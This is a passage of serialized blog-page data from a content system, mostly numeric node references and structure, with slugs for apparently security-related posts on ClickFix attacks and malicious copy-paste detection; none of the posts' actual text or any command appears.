Type":883},{},[32782],{"type":948},{"data":32784,"marks":32785,"value":30964,"nodeType":883},{},[],{"data":32787,"content":32788,"nodeType":879},{},[32789,32792,32796],{"data":32790,"marks":32791,"value":30971,"nodeType":883},{},[],{"data":32793,"marks":32794,"value":30751,"nodeType":883},{},[32795],{"type":916},{"data":32797,"marks":32798,"value":30979,"nodeType":883},{},[],{"data":32800,"content":32803,"nodeType":971},{"target":32801},{"sys":32802},{"id":30774,"type":976,"linkType":977},[],{"data":32805,"content":32806,"nodeType":879},{},[32807],{"data":32808,"marks":32809,"value":30991,"nodeType":883},{},[],{"data":32811,"content":32812,"nodeType":905},{},[],{"data":32814,"content":32815,"nodeType":909},{},[32816],{"data":32817,"marks":32818,"value":31002,"nodeType":883},{},[32819],{"type":916},{"data":32821,"content":32822,"nodeType":879},{},[32823],{"data":32824,"marks":32825,"value":31009,"nodeType":883},{},[],{"data":32827,"content":32828,"nodeType":879},{},[32829],{"data":32830,"marks":32831,"value":31016,"nodeType":883},{},[],{"data":32833,"content":32834,"nodeType":879},{},[32835],{"data":32836,"marks":32837,"value":31023,"nodeType":883},{},[],{"data":32839,"content":32840,"nodeType":879},{},[32841,32844,32851],{"data":32842,"marks":32843,"value":31030,"nodeType":883},{},[],{"data":32845,"content":32846,"nodeType":940},{"uri":31033},[32847],{"data":32848,"marks":32849,"value":31039,"nodeType":883},{},[32850],{"type":948},{"data":32852,"marks":32853,"value":31043,"nodeType":883},{},[],{"data":32855,"content":32856,"nodeType":879},{},[32857],{"data":32858,"marks":32859,"value":31050,"nodeType":883},{},[],{"data":32861,"content":32864,"nodeType":971},{"target":32862},{"sys":32863},{"id":31055,"type":976,"linkType":977},[],{"data":32866,"content":32867,"nodeType":879},{},[32868,32871,32877],{"data":32869,"marks":32870,"value":31063,"nodeType":883},{},[],{"data":32872,"content":32873,"nodeType":940},{"uri":30527},[32874],{"data":32875,"marks":32876,"value":31070,"nodeType":883},{},[],{"data":32878,"marks":32879,"value":31074,"nodeType":883},{},[],{"data":32881,"content":32884,"nodeType":971},{"target":32882},{"sys":32883},{"id":31079,"type":976,"linkType":977},[],{"data":32886,"content":32887,"nodeType":905},{},[],{"data":32889,"content":32890,"nodeType":909},{},[32891],{"data":32892,"marks":32893,"value":31091,"nodeType":883},{},[32894],{"type":916},{"data":32896,"content":32897,"nodeType":879},{},[32898],{"data":32899,"marks":32900,"value":31098,"nodeType":883},{},[],{"data":32902,"content":32903,"nodeType":1036},{},[32904],{"data":32905,"marks":32906,"value":31106,"nodeType":883},{},[32907],{"type":916},{"data":32909,"content":32910,"nodeType":879},{},[32911,32914,32921],{"data":32912,"marks":32913,"value":31113,"nodeType":883},{},[],{"data":32915,"content":32916,"nodeType":940},{"uri":31116},[32917],{"data":32918,"marks":32919,"value":31122,"nodeType":883},{},[32920],{"type":948},{"data":32922,"marks":32923,"value":31126,"nodeType":883},{},[],{"data":32925,"content":32926,"nodeType":879},{},[32927],{"data":32928,"marks":32929,"value":31133,"nodeType":883},{},[],{"data":32931,"content":32932,"nodeType":879},{},[32933],{"data":32934,"marks":32935,"value":31140,"nodeType":883},{},[],{"data":32937,"content":32938,"nodeType":879},{},[32939],{"data":32940,"marks":32941,"value":31147,"nodeType":883},{},[],{"data":32943,"content":32944,"nodeType":1036},{},[32945],{"data":32946,"marks":32947,"value":31155,"nodeType":883},{},[32948],{"type":916},{"data":32950,"content":32951,"nodeType":879},{},[32952],{"data":32953,"marks":32954,"value":31162,"nodeType":883},{},[],{"data":32956,"content":32957,"nodeType":879},{},[32958],{"data":32959,"marks":32960,"value":31169,"nodeType":883},{},[],{"data":32962,"content":32965,"nodeType":971},{"target":32963},{"sys":32964},{"id":31174,"type":976,"linkType":977},[],{"data":32967,"content":32968,"nodeType":879},{},[32969],{"data":32970,"marks":32971,"value":31182,"nodeType":883},{},[],{"data":32973,"content":32974,"nodeType":1531},{},[32975,32984,32993],{"data":32976,"content":32977,"nodeType":1535},{},[32978],{"data":32979,"content":32980,"nodeType":879},{},[32981],{"data":32982,"marks":32983,"value":31195,"nodeType":883},{},[],{"data":32985,"content":32986,"nodeType":1535},{},[32987],{"data":32988,"content":32989,"nodeType":879},{},[32990],{"data":32991,"marks":32992,"value":31205,"nodeType":883},{},[],{"data":32994,"content":32995,"nodeType":1535},{},[32996],{"data":32997,"content":32998,"nodeType":879},{},[32999],{"data":33000,"marks":33001,"value":31215,"nodeType":883},{},[],{"data":33003,"content":33006,"nodeType":971},{"target":33004},{"sys":33005},{"id":31220,"type":976,"linkType":977},[],{"data":33008,"content":33009,"nodeType":1036},{},[33010],{"data":33011,"marks":33012,"value":31229,"nodeType":883},{},[33013],{"type":916},{"data":33015,"content":33016,"nodeType":879},{},[33017,33020,33027],{"data":33018,"marks":33019,"value":31236,"nodeType":883},{},[],{"data":33021,"content":33022,"nodeType":940},{"uri":30872},[33023],{"data":33024,"marks":33025,"value":31244,"nodeType":883},{},[33026],{"type":948},{"data":33028,"marks":33029,"value":31248,"nodeType":883},{},[],{"data":33031,"content":33032,"nodeType":879},{},[33033],{"data":33034,"marks":33035,"value":31255,"nodeType":883},{},[],{"data":33037,"content":33038,"nodeType":1531},{},[33039,33048],{"data":33040,"content":33041,"nodeType":1535},{},[33042],{"data":33043,"content":33044,"nodeType":879},{},[33045],{"data":33046,"marks":33047,"value":31268,"nodeType":883},{},[],{"data":33049,"content":33050,"nodeType":1535},{},[33051],{"data":33052,"content":33053,"nodeType":879},{},[33054],{"data":33055,"marks":33056,"value":31278,"nodeType":883},{},[],{"data":33058,"content":33059,"nodeType":879},{},[33060],{"data":33061,"marks":33062,"value":31285,"nodeType":883},{},[],{"data":33064,"content":33065,"nodeType":879},{},[33066],{"data":33067,"marks":33068,"value":31292,"nodeType":883},{},[],{"data":33070,"content":33073,"nodeType":971},{"target":33071},{"sys":33072},{"id":31297,"type":976,"linkType":977},[],{"data":33075,"content":33076,"nodeType":879},{},[33077],{"data":33078,"marks":33079,"value":31305,"nodeType":883},{},[],{"data":33081,"content":33082,"nodeType":905},{},[],{"data":33084,"content":33085,"nodeType":909},{},[33086],{"data":33087,"marks":33088,"value":31316,"nodeType":883},{},[33089],{"type":916},{"data":33091,"content":33092,"nodeType":879},{},[33093,33096,33100],{"data":33094,"marks":33095,"value":30971,"nodeType":883},{},[],{"data":33097,"marks":33098,"value":30751,"nodeType":883},{},[33099],{"type":916},{"data":33101,"marks":33102,"value":31330,"nodeType":883},{},[],{"data":33104,"content":33105,"nodeType":879},{},[33106,33109,33116],{"data":33107,"marks":33108,"value":31337,"nodeType":883},{},[],{"data":33110,"content":33111,"nodeType":940},{"uri":31340},[33112],{"data":33113,"marks":33114,"value":31346,"nodeType":883},{},[33115],{"type":948},{"data":33117,"marks":33118,"value":31350,"nodeType":883},{},[],{"data":33120,"content":33121,"nodeType":879},{},[33122],{"data":33123,"marks":33124,"value":31357,"nodeType":883},{},[],{"data":33126,"content":33127,"nodeType":879},{},[33128],{"data":33129,"marks":33130,"value":31364,"nodeType":883},{},[],{"data":33132,"content":33133,"nodeType":879},{},[33134],{"data":33135,"marks":33136,"value":31371,"nodeType":883},{},[],{"data":33138,"content":33141,"nodeType":971},{"target":33139},{"sys":33140},{"id":30774,"type":976,"linkType":977},[],{"data":33143,"content":33144,"nodeType":1036},{},[33145],{"data":33146,"marks":33147,"value":31384,"nodeType":883},{},[33148],{"type":916},{"data":33150,"content":33151,"nodeType":879},{},[33152,33155,33161],{"data":33153,"marks":33154,"value":31391,"nodeType":883},{},[],{"data":33156,"content":33157,"nodeType":940},{"uri":31394},[33158],{"data":33159,"marks":33160,"value":31399,"nodeType":883},{},[],{"data":33162,"marks":33163,"value":31403,"nodeType":883},{},[],{"data":33165,"content":33166,"nodeType":905},{},[],{"data":33168,"content":33169,"nodeType":909},{},[33170],{"data":33171,"marks":33172,"value":12611,"nodeType":883},{},[33173],{"type":916},{"data":33175,"content":33176,"nodeType":879},{},[33177],{"data":33178,"marks":33179,"value":31420,"nodeType":883},{},[],{"data":33181,"content":33182,"nodeType":879},{},[33183],{"data":33184,"marks":33185,"value":31427,"nodeType":883},{},[],{"data":33187,"content":33188,"nodeType":879},{},[33189],{"data":33190,"marks":33191,"value":31434,"nodeType":883},{},[],{"data":33193,"content":33194,"nodeType":879},{},[33195],{"data":33196,"marks":33197,"value":31441,"nodeType":883},{},[],{"data":33199,"content":33200,"nodeType":879},{},[33201,33204,33211,33214,33221],{"data":33202,"marks":33203,"value":16267,"nodeType":883},{},[],{"data":33205,"content":33206,"nodeType":940},{"uri":10222},[33207],{"data":33208,"marks":33209,"value":10228,"nodeType":883},{},[33210],{"type":948},{"data":33212,"marks":33213,"value":26256,"nodeType":883},{},[],{"data":33215,"content":33216,"nodeType":940},{"uri":4772},[33217],{"data":33218,"marks":33219,"value":1751,"nodeType":883},{},[33220],{"type":948},{"data":33222,"marks":33223,"value":1350,"nodeType":883},{},[],{"data":33225,"content":33228,"nodeType":971},{"target":33226},{"sys":33227},{"id":31220,"type":976,"linkType":977},[],{"data":33230,"content":33231,"nodeType":879},{},[33232],{"data":33233,"marks":33234,"value":21,"nodeType":883},{},[],{"items":33236},[33237,33239],{"sys":33238,"name":343},{"id":3276},{"sys":33240,"name":3273},{"id":3272},{"items":33242},[33243],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":33244},{"url":872},{"__typename":1967,"sys":33246,"content":33247,"title":862,"synopsis":4815,"hashTags":59,"publishedDate":1963,"slug":4802,"tagsCollection":33971,"authorsCollection":33977},{"id":4817},{"json":33248},{"nodeType":875,"data":33249,"content":33250},{},[33251,33264,33270,33273,33280,33286,33292,33320,33325,33331,33337,33343,33349,33352,33359,33365,33371,33374,33381,33386,33392,33398,33403,33419,33425,33431,33437,33442,33445,33452,33458,33482,33488,33501,33516,33525,33530,33533,33540,33555,33561,33580,33606,33634,33640,33645,33648,33655,33670,33676,33698,33722,33727,33730,33737,33759,33774,33780,33822,33837,33843,33849,33854,33857,33864,33870,33876,33898,33913,33918,33921,33928,33943,33949,33955],{"nodeType":879,"data":33252,"content":33253},{},[33254,33257,33261],{"nodeType":883,"value":884,"marks":33255,"data":33256},[],{},{"nodeType":883,"value":888,"marks":33258,"data":33260},[33259],{"type":891},{},{"nodeType":883,"value":894,"marks":33262,"data":33263},[],{},{"nodeType":879,"data":33265,"content":33266},{},[33267],{"nodeType":883,"value":901,"marks":33268,"data":33269},[],{},{"nodeType":905,"data":33271,"content":33272},{},[],{"nodeType":909,"data":33274,"content":33275},{},[33276],{"nodeType":883,"value":913,"marks":33277,"data":33279},[33278],{"type":916},{},{"nodeType":879,"data":33281,"content":33282},{},[33283],{"nodeType":883,"value":922,"marks":33284,"data":33285},[],{},{"nodeType":879,"data":33287,"content":33288},{},[33289],{"nodeType":883,"value":929,"marks":33290,"data":33291},[],{},{"nodeType":879,"data":33293,"content":33294},{},[33295,33298,33305,33308,33311,33317],{"nodeType":883,"value":936,"marks":33296,"data":33297},[],{},{"nodeType":940,"data":33299,"content":33300},{"uri":942},[33301],{"nodeType":883,"value":945,"marks":33302,"data":33304},[33303],{"type":948},{},{"nodeType":883,"value":951,"marks":33306,"data":33307},[],{},{"nodeType":883,"value":955,"marks":33309,"data":33310},[],{},{"nodeType":940,"data":33312,"content":33313},{"uri":960},[33314],{"nodeType":883,"value":963,"marks":33315,"data":33316},[],{},{"nodeType":883,"value":967,"marks":33318,"data":33319},[],{},{"nodeType":971,"data":33321,"content":33324},{"target":33322},{"sys":33323},{"id":975,"type":976,"linkType":977},[],{"nodeType":879,"data":33326,"content":33327},{},[33328],{"nodeType":883,"value":983,"marks":33329,"data":33330},[],{},{"nodeType":879,"data":33332,"content":33333},{},[33334],{"nodeType":883,"value":990,"marks":33335,"data":33336},[],{},{"nodeType":879,"data":33338,"content":33339},{},[33340],{"nodeType":883,"value":997,"marks":33341,"data":33342},[],{},{"nodeType":879,"data":33344,"content":33345},{},[33346],{"nodeType":883,"value":1004,"marks":33347,"data":33348},[],{},{"nodeType":905,"data":33350,"content":33351},{},[],{"nodeType":909,"data":33353,"content":33354},{},[33355],{"nodeType":883,"value":1014,"marks":33356,"data":33358},[33357],{"type":916},{},{"nodeType":879,"data":33360,"content":33361},{},[33362],{"nodeType":883,"value":1022,"marks":33363,"data":33364},[],{},{"nodeType":879,"data":33366,"content":33367},{},[33368],{"nodeType":883,"value":1029,"marks":33369,"data":33370},[],{},{"nodeType":905,"data":33372,"content":33373},{},[],{"nodeType":1036,"data":33375,"content":33376},{},[33377],{"nodeType":883,"value":1040,"marks":33378,"data":33380},[33379],{"type":916},{},{"nodeType":971,"data":33382,"content":33385},{"target":33383},{"sys":33384},{"id":1048,"type":976,"linkType":977},[],{"nodeType":879,"data":33387,"content":33388},{},[33389],{"nodeType":883,"value":1054,"marks":33390,"data":33391},[],{},{"nodeType":879,"data":33393,"content":33394},{},[33395],{"nodeType":883,"value":1061,"marks":33396,"data":33397},[],{},{"nodeType":971,"data":33399,"content":33402},{"target":33400},{"sys":33401},{"id":1068,"type":976,"linkType":977},[],{"nodeType":879,"data":33404,"content":33405},{},[33406,33409,33416],{"nodeType":883,"value":1074,"marks":33407,"data":33408},[],{},{"nodeType":940,"data":33410,"content":33411},{"uri":1079},[33412],{"nodeType":883,"value":1082,"marks":33413,"data":33415},[33414],{"type":948},{},{"nodeType":883,"value":1087,"marks":33417,"data":33418},[],{},{"nodeType":879,"data":33420,"content":33421},{},[33422],{"nodeType":883,"value":1094,"marks":33423,"data":33424},[],{},{"nodeType":879,"data":33426,"content":33427},{},[33428],{"nodeType":883,"value":1101,"marks":33429,"data":33430},[],{},{"nodeType":879,"data":33432,"content":33433},{},[33434],{"nodeType":883,"value":1108,"marks":33435,"data":33436},[],{},{"nodeType":971,"data":33438,"content":33441},{"target":33439},{"sys":33440},{"id":1115,"type":976,"linkType":977},[],{"nodeType":905,"data":33443,"content":33444},{},[],{"nodeType":1036,"data":33446,"content":33447},{},[33448],{"nodeType":883,"value":1124,"marks":33449,"data":33451},[33450],{"type":916},{},{"nodeType":879,"data":33453,"content":33454},{},[33455],{"nodeType":883,"value":1132,"marks":33456,"data":33457},[],{},{"nodeType":879,"data":33459,"content":33460},{},[33461,33464,33470,33473,33479],{"nodeType":883,"value":1139,"marks":33462,"data":33463},[],{},{"nodeType":940,"data":33465,"content":33466},{"uri":1144},[33467],{"nodeType":883,"value":1147,"marks":33468,"data":33469},[],{},{"nodeType":883,"value":1151,"marks":33471,"data":33472},[],{},{"nodeType":940,"data":33474,"content":33475},{"uri":1156},[33476],{"nodeType":883,"value":1159,"marks":33477,"data":33478},[],{},{"nodeType":883,"value":1163,"marks":33480,"data":33481},[],{},{"nodeType":879,"data":33483,"content":33484},{},[33485],{"nodeType":883,"value":1170,"marks":33486,"data":33487},[],{},{"nodeType":879,"data":33489,"content":33490},{},[33491,33494,33498],{"nodeType":883,"value":1177,"marks":33492,"data":33493},[],{},{"nodeType":883,"value":1181,"marks":33495,"data":33497},[33496],{"type":916},{},{"nodeType":883,"value":1186,"marks":33499,"data":33500},[],{},{"nodeType":879,"data":33502,"content":33503},{},[33504,33507,33513],{"nodeType":883,"value":1193,"marks":33505,"data":33506},[],{},{"nodeType":940,"data":33508,"content":33509},{"uri":1198},[33510],{"nodeType":883,"value":1201,"marks":33511,"data":33512},[],{},{"nodeType":883,"value":1205,"marks":33514,"data":33515},[],{},{"nodeType":879,"data":33517,"content":33518},{},[33519,33522],{"nodeType":883,"value":1212,"marks":33520,"data":33521},[],{},{"nodeType":883,"value":1216,"marks":33523,"data":33524},[],{},{"nodeType":971,"data":33526,"content":33529},{"target":33527},{"sys":33528},{"id":1223,"type":976,"linkType":977},[],{"nodeType":905,"data":33531,"content":33532},{},[],{"nodeType":1036,"data":33534,"content":33535},{},[33536],{"nodeType":883,"value":1232,"marks":33537,"data":33539},[33538],{"type":916},{},{"nodeType":879,"data":33541,"content":33542},{},[33543,33546,33552],{"nodeType":883,"value":1240,"marks":33544,"data":33545},[],{},{"nodeType":940,"data":33547,"content":33548},{"uri":1245},[33549],{"nodeType":883,"value":1248,"marks":33550,"data":33551},[],{},{"nodeType":883,"value":1252,"marks":33553,"data":33554},[],{},{"nodeType":879,"data":33556,"content":33557},{},[33558],{"nodeType":883,"value":1259,"marks":33559,"data":33560},[],{},{"nodeType":879,"data":33562,"content":33563},{},[33564,33568,33571,33577],{"nodeType":883,"value":703,"marks":33565,"data":33567},[33566],{"type":916},{},{"nodeType":883,"value":1270,"marks":33569,"data":33570},[],{},{"nodeType":940,"data":33572,"content":33573},{"uri":1275},[33574],{"nodeType":883,"value":1278,"marks":33575,"data":33576},[],{},{"nodeType":883,"value":1282,"marks":33578,"data":33579},[],{},{"nodeType":879,"data":33581,"content":33582},{},[33583,33587,33590,33596,33599,33603],{"nodeType":883,"value":361,"marks":33584,"data":33586},[33585],{"type":916},{},{"nodeType":883,"value":1293,"marks":33588,"data":33589},[],{},{"nodeType":940,"data":33591,"content":33592},{"uri":1298},[33593],{"nodeType":883,"value":1301,"marks":33594,"data":33595},[],{},{"nodeType":883,"value":1305,"marks":33597,"data":33598},[],{},{"nodeType":883,"value":1309,"marks":33600,"data":33602},[33601],{"type":916},{},{"nodeType":883,"value":1314,"marks":33604,"data":33605},[],{},{"nodeType":879,"data":33607,"content":33608},{},[33609,33613,33616,33622,33625,33631],{"nodeType":883,"value":1321,"marks":33610,"data":33612},[33611],{"type":916},{},{"nodeType":883,"value":1326,"marks":33614,"data":33615},[],{},{"nodeType":940,"data":33617,"content":33618},{"uri":1331},[33619],{"nodeType":883,"value":1334,"marks":33620,"data":33621},[],{},{"nodeType":883,"value":1338,"marks":33623,"data":33624},[],{},{"nodeType":940,"data":33626,"content":33627},{"uri":1343},[33628],{"nodeType":883,"value":1346,"marks":33629,"data":33630},[],{},{"nodeType":883,"value":1350,"marks":33632,"data":33633},[],{},{"nodeType":879,"data":33635,"content":33636},{},[33637],{"nodeType":883,"value":1357,"marks":33638,"data":33639},[],{},{"nodeType":971,"data":33641,"content":33644},{"target":33642},{"sys":33643},{"id":1364,"type":976,"linkType":977},[],{"nodeType":905,"data":33646,"content":33647},{},[],{"nodeType":1036,"data":33649,"content":33650},{},[33651],{"nodeType":883,"value":1373,"marks":33652,"data":33654},[33653],{"type":916},{},{"nodeType":879,"data":33656,"content":33657},{},[33658,33661,33667],{"nodeType":883,"value":1381,"marks":33659,"data":33660},[],{},{"nodeType":940,"data":33662,"content":33663},{"uri":1386},[33664],{"nodeType":883,"value":1389,"marks":33665,"data":33666},[],{},{"nodeType":883,"value":1393,"marks":33668,"data":33669},[],{},{"nodeType":879,"data":33671,"content":33672},{},[33673],{"nodeType":883,"value":1400,"marks":33674,"data":33675},[],{},{"nodeType":879,"data":33677,"content":33678},{},[33679,33682,33686,33689,33695],{"nodeType":883,"value":1407,"marks":33680,"data":33681},[],{},{"nodeType":883,"value":1411,"marks":33683,"data":33685},[33684],{"type":916},{},{"nodeType":883,"value":1416,"marks":33687,"data":33688},[],{},{"nodeType":940,"data":33690,"content":33691},{"uri":1421},[33692],{"nodeType":883,"value":1424,"marks":33693,"data":33694},[],{},{"nodeType":883,"value":1428,"marks":33696,"data":33697},[],{},{"nodeType":879,"data":33699,"content":33700},{},[33701,33704,33710,33713,33719],{"nodeType":883,"value":1435,"marks":33702,"data":33703},[],{},{"nodeType":940,"data":33705,"content":33706},{"uri":1440},[33707],{"nodeType":883,"value":1443,"marks":33708,"data":33709},[],{},{"nodeType":883,"value":1447,"marks":33711,"data":33712},[],{},{"nodeType":940,"data":33714,"content":33715},{"uri":1452},[33716],{"nodeType":883,"value":1455,"marks":33717,"data":33718},[],{},{"nodeType":883,"value":1459,"marks":33720,"data":33721},[],{},{"nodeType":971,"data":33723,"content":33726},{"target":33724},{"sys":33725},{"id":1466,"type":976,"linkType":977},[],{"nodeType":905,"data":33728,"content":33729},{},[],{"nodeType":1036,"data":33731,"content":33732},{},[33733],{"nodeType":883,"value":1475,"marks":33734,"data":33736},[33735],{"type":916},{},{"nodeType":879,"data":33738,"content":33739},{},[33740,33743,33749,33752,33756],{"nodeType":883,"value":1483,"marks":33741,"data":33742},[],{},{"nodeType":940,"data":33744,"content":33745},{"uri":1488},[33746],{"nodeType":883,"value":1491,"marks":33747,"data":33748},[],{},{"nodeType":883,"value":1495,"marks":33750,"data":33751},[],{},{"nodeType":883,"value":1499,"marks":33753,"data":33755},[33754],{"type":916},{},{"nodeType":883,"value":1350,"marks":33757,"data":33758},[],{},{"nodeType":879,"data":33760,"content":33761},{},[33762,33765,33771],{"nodeType":883,"value":1510,"marks":33763,"data":33764},[],{},{"nodeType":940,"data":33766,"content":33767},{"uri":1421},[33768],{"nodeType":883,"value":1424,"marks":33769,"data":33770},[],{},{"nodeType":883,"value":1520,"marks":33772,"data":33773},[],{},{"nodeType":879,"data":33775,"content":33776},{},[33777],{"nodeType":883,"value":1527,"marks":33778,"data":33779},[],{},{"nodeType":1531,"data":33781,"content":33782},{},[33783,33796,33809],{"nodeType":1535,"data":33784,"content":33785},{},[33786],{"nodeType":879,"data":33787,"content":33788},{},[33789,33793],{"nodeType":883,"value":1542,"marks":33790,"data":33792},[33791],{"type":916},{},{"nodeType":883,"value":1547,"marks":33794,"data":33795},[],{},{"nodeType":1535,"data":33797,"content":33798},{},[33799],{"nodeType":879,"data":33800,"content":33801},{},[33802,33806],{"nodeType":883,"value":1557,"marks":33803,"data":33805},[33804],{"type":916},{},{"nodeType":883,"value":1562,"marks":33807,"data":33808},[],{},{"nodeType":1535,"data":33810,"content":33811},{},[33812],{"nodeType":879,"data":33813,"content":33814},{},[33815,33819],{"nodeType":883,"value":1572,"marks":33816,"data":33818},[33817],{"type":916},{},{"nodeType":883,"value":1577,"marks":33820,"data":33821},[],{},{"nodeType":879,"data":33823,"content":33824},{},[33825,33828,33834],{"nodeType":883,"value":1584,"marks":33826,"data":33827},[],{},{"nodeType":940,"data":33829,"content":33830},{"uri":1589},[33831],{"nodeType":883,"value":1592,"marks":33832,"data":33833},[],{},{"nodeType":883,"value":1596,"marks":33835,"data":33836},[],{},{"nodeType":879,"data":33838,"content":33839},{},[33840],{"nodeType":883,"value":1603,"marks":33841,"data":33842},[],{},{"nodeType":879,"data":33844,"content":33845},{},[33846],{"nodeType":883,"value":1610,"marks":33847,"data":33848},[],{},{"nodeType":971,"data":33850,"content":33853},{"target":33851},{"sys":33852},{"id":1617,"type":976,"linkType":977},[],{"nodeType":905,"data":33855,"content":33856},{},[],{"nodeType":1036,"data":33858,"content":33859},{},[33860],{"nodeType":883,"value":1626,"marks":33861,"data":33863},[33862],{"type":916},{},{"nodeType":879,"data":33865,"content":33866},{},[33867],{"nodeType":883,"value":1634,"marks":33868,"data":33869},[],{},{"nodeType":879,"data":33871,"content":33872},{},[33873],{"nodeType":883,"value":1641,"marks":33874,"data":33875},[],{},{"nodeType":879,"data":33877,"content":33878},{},[33879,33882,33888,33891,33895],{"nodeType":883,"value":1648,"marks":33880,"data":33881},[],{},{"nodeType":940,"data":33883,"content":33884},{"uri":1421},[33885],{"nodeType":883,"value":1655,"marks":33886,"data":33887},[],{},{"nodeType":883,"value":1495,"marks":33889,"data":33890},[],{},{"nodeType":883,"value":1662,"marks":33892,"data":33894},[33893],{"type":916},{},{"nodeType":883,"value":1667,"marks":33896,"data":33897},[],{},{"nodeType":879,"data":33899,"content":33900},{},[33901,33904,33910],{"nodeType":883,"value":1674,"marks":33902,"data":33903},[],{},{"nodeType":940,"data":33905,"content":33906},{"uri":1679},[33907],{"nodeType":883,"value":1682,"marks":33908,"data":33909},[],{},{"nodeType":883,"value":1686,"marks":33911,"data":33912},[],{},{"nodeType":971,"data":33914,"content":33917},{"target":33915},{"sys":33916},{"id":1693,"type":976,"linkType":977},[],{"nodeType":905,"data":33919,"content":33920},{},[],{"nodeType":909,"data":33922,"content":33923},{},[33924],{"nodeType":883,"value":1702,"marks":33925,"data":33927},[33926],{"type":916},{},{"nodeType":879,"data":33929,"content":33930},{},[33931,33934,33940],{"nodeType":883,"value":1710,"marks":33932,"data":33933},[],{},{"nodeType":940,"data":33935,"content":33936},{"uri":1715},[33937],{"nodeType":883,"value":1718,"marks":33938,"data":33939},[],{},{"nodeType":883,"value":1722,"marks":33941,"data":33942},[],{},{"nodeType":879,"data":33944,"content":33945},{},[33946],{"nodeType":883,"value":1729,"marks":33947,"data":33948},[],{},{"nodeType":879,"data":33950,"content":33951},{},[33952],{"nodeType":883,"value":1736,"marks":33953,"data":33954},[],{},{"nodeType":879,"data":33956,"content":33957},{},[33958,33961,33968],{"nodeType":883,"value":1743,"marks":33959,"data":33960},[],{},{"nodeType":940,"data":33962,"content":33963},{"uri":1748},[33964],{"nodeType":883,"value":1751,"marks":33965,"data":33967},[33966],{"type":948},{},{"nodeType":883,"value":1350,"marks":33969,"data":33970},[],{},{"items":33972},[33973,33975],{"sys":33974,"name":3273},{"id":3272},{"sys":33976,"name":343},{"id":3276},{"items":33978},[33979],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":33980},{"url":872},"blog\u002Fthe-most-advanced-clickfix-yet",{"json":33983},{"data":33984,"content":33985,"nodeType":875},{},[33986],{"data":33987,"content":33988,"nodeType":879},{},[33989],{"data":33990,"marks":33991,"value":30844,"nodeType":883},{},[],{"id":30266,"publishedAt":33993},"2026-08-12T11:53:36.977Z",{"items":33995},[33996,33998],{"sys":33997,"name":343},{"id":3276},{"sys":33999,"name":3273},{"id":3272},{"items":34001},[34002,34004,34006,34008,34010,34012,34014,34016,34018,34020,34022,34024,34026],{"sys":34003,"name":280,"slug":281,"tier":31},{"id":277},{"sys":34005,"name":521,"slug":522,"tier":31},{"id":518},{"sys":34007,"name":343,"slug":344,"tier":31},{"id":340},{"sys":34009,"name":641,"slug":642,"tier":31},{"id":638},{"sys":34011,"name":316,"slug":317,"tier":45},{"id":313},{"sys":34013,"name":442,"slug":443,"tier":45},{"id":439},{"sys":34015,"name":477,"slug":478,"tier":45},{"id":474},{"sys":34017,"name":607,"slug":608,"tier":45},{"id":604},{"sys":34019,"name":450,"slug":451,"tier":45},{"id":447},{"sys":34021,"name":424,"slug":425,"tier":45},{"id":421},{"sys":34023,"name":564,"slug":565,"tier":45},{"id":561},{"sys":34025,"name":352,"slug":353,"tier":45},{"id":349},{"sys":34027,"name":379,"slug":380,"tier":45},{"id":376},"HliWVuj6nLSGBgSxLO--acbFZbFv91A0xcMXBLqD7M0",{"id":34030,"title":27540,"authorsCollection":34031,"content":34036,"extension":228,"faqItemsCollection":34627,"faqTitle":59,"featured":6,"hashTags":59,"meta":34629,"metaTitle":34630,"ogImage":59,"postType":34631,"publishedDate":31480,"relatedBlogPostsCollection":34632,"slug":27541,"stem":36137,"subtitle":36138,"summary":36139,"synopsis":31479,"sys":36150,"tagsCollection":36152,"topicsCollection":36158,"__hash__":36188},"blog\u002Fblog\u002Fintroducing-malicious-copy-paste-detection.json",{"items":34032},[34033],{"fullName":866,"firstName":867,"jobTitle":868,"socialLinks":34034,"profilePicture":34035},[870],{"url":872},{"json":34037,"links":34571},{"data":34038,"content":34039,"nodeType":875},{},[34040,34076,34122,34135,34140,34146,34149,34156,34162,34168,34174,34190,34196,34201,34216,34221,34224,34231,34237,34244,34260,34266,34272,34278,34285,34291,34297,34302,34308,34338,34343,34350,34366,34372,34393,34399,34405,34410,34416,34419,34426,34439,34455,34461,34467,34473,34478,34485,34500,34503,34510,34516,34522,34528,34534,34560,34565],{"data":34041,"content":34042,"nodeType":879},{},[34043,34046,34053,34056,34063,34066,34073],{"data":34044,"marks":34045,"value":30869,"nodeType":883},{},[],{"data":34047,"content":34048,"nodeType":940},{"uri":30872},[34049],{"data":34050,"marks":34051,"value":316,"nodeType":883},{},[34052],{"type":948},{"data":34054,"marks":34055,"value":30881,"nodeType":883},{},[],{"data":34057,"content":34058,"nodeType":940},{"uri":30884},[34059],{"data":34060,"marks":34061,"value":30890,"nodeType":883},{},[34062],{"type":948},{"data":34064,"marks":34065,"value":30894,"nodeType":883},{},[],{"data":34067,"content":34068,"nodeType":940},{"uri":30897},[34069],{"data":34070,"marks":34071,"value":30903,"nodeType":883},{},[34072],{"type":948},{"data":34074,"marks":34075,"value":30907,"nodeType":883},{},[],{"data":34077,"content":34078,"nodeType":879},{},[34079,34082,34089,34092,34099,34102,34109,34112,34119],{"data":34080,"marks":34081,"value":30914,"nodeType":883},{},[],{"data":34083,"content":34084,"nodeType":940},{"uri":30917},[34085],{"data":34086,"marks":34087,"value":30923,"nodeType":883},{},[34088],{"type":948},{"data":34090,"marks":34091,"value":2524,"nodeType":883},{},[],{"data":34093,"content":34094,"nodeType":940},{"uri":30929},[34095],{"data":34096,"marks":34097,"value":30935,"nodeType":883},{},[34098],{"type":948},{"data":34100,"marks":34101,"value":2524,"nodeType":883},{},[],{"data":34103,"content":34104,"nodeType":940},{"uri":30941},[34105],{"data":34106,"marks":34107,"value":30947,"nodeType":883},{},[34108],{"type":948},{"data":34110,"marks":34111,"value":30951,"nodeType":883},{},[],{"data":34113,"content":34114,"nodeType":940},{"uri":30954},[34115],{"data":34116,"marks":34117,"value":30960,"nodeType":883},{},[34118],{"type":948},{"data":34120,"marks":34121,"value":30964,"nodeType":883},{},[],{"data":34123,"content":34124,"nodeType":879},{},[34125,34128,34132],{"data":34126,"marks":34127,"value":30971,"nodeType":883},{},[],{"data":34129,"marks":34130,"value":30751,"nodeType":883},{},[34131],{"type":916},{"data":34133,"marks":34134,"value":30979,"nodeType":883},{},[],{"data":34136,"content":34139,"nodeType":971},{"target":34137},{"sys":34138},{"id":30774,"type":976,"linkType":977},[],{"data":34141,"content":34142,"nodeType":879},{},[34143],{"data":34144,"marks":34145,